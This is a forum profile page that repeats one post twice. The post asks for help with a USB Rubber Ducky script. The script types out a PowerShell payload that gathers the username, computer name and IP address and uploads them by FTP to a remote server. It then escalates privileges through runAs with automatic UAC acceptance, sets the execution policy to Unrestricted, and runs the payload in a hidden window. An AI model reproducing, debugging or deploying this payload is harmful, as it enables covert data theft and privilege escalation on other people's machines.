Jump to content

tats

Members
  • Posts

    4
  • Joined

  • Last visited

Posts posted by tats

  1. Wrote a ducky script to capture Computer Name, Username, IP address and Current Time stamp through a Powershell script. Never works the way I want  after encoding it and using the BIN file. The RUN window never opens and nor does notepad. It randomly opens some excel file on the desktop and writes the STRING values there. The powershell commands at the end of the script seem to executed fine in the RUN window, but since the PS1 file is never created using notepad, they are useless. I feel it might have to do something with the encoding - I've tried GB and US (my keyboard layout is US). I have verified that the powershell script works otherwise. For encoding, I have tried both - encoder on DUCKTOOLKIT site as well as the local JAR encoder. I have also tried with all DELAYs more than 1000. Need help in figuring out what's going wrong?

    NOTE: the username, password and server were replaced with correct values in the actual script. Successfully verified the PS script.

    Ducky Script -

    DELAY 500
    GUI R
    DELAY 500
    STRING notepad
    DELAY 500
    ENTER
    DELAY 1000
    STRING $username = $env:username
    ENTER
    STRING $computername = $env:computername
    ENTER
    STRING $ipaddress = ([System.Net.DNS]::GetHostAddresses($env:computername) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | select-object IPAddressToString)[0].IPAddressToString
    ENTER
    STRING $timestamp = (get-date).ToString('d-M-y HH:mm:ss')
    ENTER
    STRING $File = "C:\Users\$username\$computername.txt"
    ENTER
    STRING "Computername: $computername" >> $File
    ENTER
    STRING "Username: $username" >> $File
    ENTER
    STRING "IP-Address: $ipaddress" >> $File
    ENTER
    STRING "Time: $timestamp" >> $File
    ENTER
    STRING "`n" >> $File
    ENTER
    STRING $ftp = "ftp://username:password@server/Ducky/$computername.txt"
    ENTER
    STRING $webclient = New-Object System.Net.WebClient
    ENTER
    STRING $uri = New-Object System.Uri($ftp)
    ENTER
    STRING $webclient.UploadFile($uri, $File)
    ENTER
    STRING $wshell = New-Object -ComObject Wscript.Shell
    ENTER
    STRING $wshell.Popup("Bazinga",0,"OOPS",0x1)
    DELAY 3000
    CTRL s
    DELAY 1000
    STRING %TEMP%\cache.ps1
    TAB
    DELAY 1000
    DOWNARROW
    DOWNARROW
    DELAY 2000
    ENTER
    ALT s
    DELAY 1000
    ALT F4
    DELAY 1000
    GUI r
    DELAY 500    
    STRING powershell Start-Process cmd -Verb runAs
    ENTER
    DELAY 500  
    ALT y
    DELAY 500  
    STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
    ENTER
    DELAY 500  
    STRING powershell.exe -windowstyle hidden -File %TEMP%\cache.ps1
    ENTER

  2. Wrote a ducky script to capture Computer Name, Username, IP address and Current Time stamp through a Powershell script. Never works the way I want  after encoding it and using the BIN file. The RUN window never opens and nor does notepad. It randomly opens some excel file on the desktop and writes the STRING values there. The powershell commands at the end of the script seem to executed fine in the RUN window, but since the PS1 file is never created using notepad, they are useless. I feel it might have to do something with the encoding - I've tried GB and US (my keyboard layout is US). I have verified that the powershell script works otherwise. For encoding, I have tried both - encoder on DUCKTOOLKIT site as well as the local JAR encoder. I have also tried with all DELAYs more than 1000. Need help in figuring out what's going wrong?

    NOTE: the username, password and server were replaced with correct values in the actual script. Successfully verified the PS script.

    Ducky Script -

    DELAY 500
    GUI R
    DELAY 500
    STRING notepad
    DELAY 500
    ENTER
    DELAY 1000
    STRING $username = $env:username
    ENTER
    STRING $computername = $env:computername
    ENTER
    STRING $ipaddress = ([System.Net.DNS]::GetHostAddresses($env:computername) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | select-object IPAddressToString)[0].IPAddressToString
    ENTER
    STRING $timestamp = (get-date).ToString('d-M-y HH:mm:ss')
    ENTER
    STRING $File = "C:\Users\$username\$computername.txt"
    ENTER
    STRING "Computername: $computername" >> $File
    ENTER
    STRING "Username: $username" >> $File
    ENTER
    STRING "IP-Address: $ipaddress" >> $File
    ENTER
    STRING "Time: $timestamp" >> $File
    ENTER
    STRING "`n" >> $File
    ENTER
    STRING $ftp = "ftp://username:password@server/Ducky/$computername.txt"
    ENTER
    STRING $webclient = New-Object System.Net.WebClient
    ENTER
    STRING $uri = New-Object System.Uri($ftp)
    ENTER
    STRING $webclient.UploadFile($uri, $File)
    ENTER
    STRING $wshell = New-Object -ComObject Wscript.Shell
    ENTER
    STRING $wshell.Popup("Bazinga",0,"OOPS",0x1)
    DELAY 3000
    CTRL s
    DELAY 1000
    STRING %TEMP%\cache.ps1
    TAB
    DELAY 1000
    DOWNARROW
    DOWNARROW
    DELAY 2000
    ENTER
    ALT s
    DELAY 1000
    ALT F4
    DELAY 1000
    GUI r
    DELAY 500    
    STRING powershell Start-Process cmd -Verb runAs
    ENTER
    DELAY 500  
    ALT y
    DELAY 500  
    STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
    ENTER
    DELAY 500  
    STRING powershell.exe -windowstyle hidden -File %TEMP%\cache.ps1
    ENTER

×
×
  • Create New...